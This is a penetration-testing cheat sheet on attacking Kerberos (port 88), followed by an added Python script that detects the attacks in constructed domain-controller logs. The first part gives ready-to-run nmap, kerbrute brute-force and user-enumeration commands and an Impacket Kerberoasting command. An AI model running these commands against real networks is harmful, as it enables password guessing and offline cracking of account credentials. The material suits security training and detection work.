Kerberos (88)
Kerberos is a network authentication protocol that works on the basis of "tickets" to allow nodes to prove their identity over a non-secure network in a secure manner. Kerberos provides mutual authentication—both the user and the server verify each other's identity.
Identify Kerberos
To find all machines on a network that respond to Kerberos on TCP port 88:
nmap -p 88 --open -sV -Pn -oA nmap/Kerberos 10.0.0.0/24
Password Guessing
Test for weak passwords associated with Kerberos-enabled users.
kerbrute bruteforce --dc 10.0.0.1 -d domain.com UsersPasswords.txt
User enumeration
./kerbrute_linux_amd64 userenum --dc 192.168.221.187 -d access ../../SecLists/Usernames/xato-net-10-million-usernames.txt
Kerberoasting
User accounts with SPNs can be Kerberoasted. This involves requesting a service ticket for the account's SPN; because the ticket is encrypted with a key derived from that account's password, it can then be cracked offline.
python GetUserSPNs.py -request -dc-ip 10.0.0.1 DOMAIN/user
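Detection
Seen from the domain controller, the user enumeration, password guessing and Kerberoasting techniques above surface in Security-log events 4768, 4771 and 4769. The following is an added example, not part of the original page: the event dictionaries are constructed, and the simplified field names and the threshold of 3 are assumptions.

```python
from collections import Counter, defaultdict

# Constructed sample: simplified fields from DC Security-log events
# 4768 (TGT request), 4771 (pre-auth failed) and 4769 (service ticket request).
EVENTS = (
    [{"id": 4768, "ip": "10.0.0.50", "user": u, "status": "0x6"}
     for u in ("admin", "backup", "jsmith", "test")]
    + [{"id": 4768, "ip": "10.0.0.20", "user": "alcie", "status": "0x6"}]
    + [{"id": 4771, "ip": "10.0.0.50", "user": "jdoe", "status": "0x18"}] * 5
    + [{"id": 4771, "ip": "10.0.0.21", "user": "alice", "status": "0x18"}]
    + [{"id": 4769, "ip": "10.0.0.50", "user": "user", "service": s, "etype": "0x17"}
       for s in ("svc_sql", "svc_web", "svc_backup")]
    + [{"id": 4769, "ip": "10.0.0.21", "user": "alice", "service": "FILESRV01$", "etype": "0x12"},
       {"id": 4769, "ip": "10.0.0.21", "user": "alice", "service": "svc_sql", "etype": "0x12"}]
)

def detect(events, threshold=3):
    """Return sorted (alert, source, count) tuples; threshold is an assumed tuning value."""
    unknown = defaultdict(set)   # source IP -> distinct nonexistent usernames (0x6)
    preauth = Counter()          # source IP -> wrong-password failures (0x18)
    rc4 = defaultdict(set)       # requesting account -> user-account services with RC4 tickets
    for e in events:
        if e["id"] == 4768 and e["status"] == "0x6":
            unknown[e["ip"]].add(e["user"])
        elif e["id"] == 4771 and e["status"] == "0x18":
            preauth[e["ip"]] += 1
        elif e["id"] == 4769 and e["etype"] == "0x17":
            svc = e["service"]
            # Machine accounts end in "$" and krbtgt is the KDC's own account: skip both.
            if not svc.endswith("$") and svc.lower() != "krbtgt":
                rc4[e["user"]].add(svc)
    alerts = [("user-enumeration", ip, len(u)) for ip, u in unknown.items() if len(u) >= threshold]
    alerts += [("password-guessing", ip, n) for ip, n in preauth.items() if n >= threshold]
    alerts += [("kerberoasting", acct, len(s)) for acct, s in rc4.items() if len(s) >= threshold]
    return sorted(alerts)

if __name__ == "__main__":
    for alert in detect(EVENTS):
        print(alert)
```

The single mistyped username from 10.0.0.20, the one failed logon from 10.0.0.21 and the AES (0x12) ticket requests stay below the threshold or outside the RC4 filter and raise no alert.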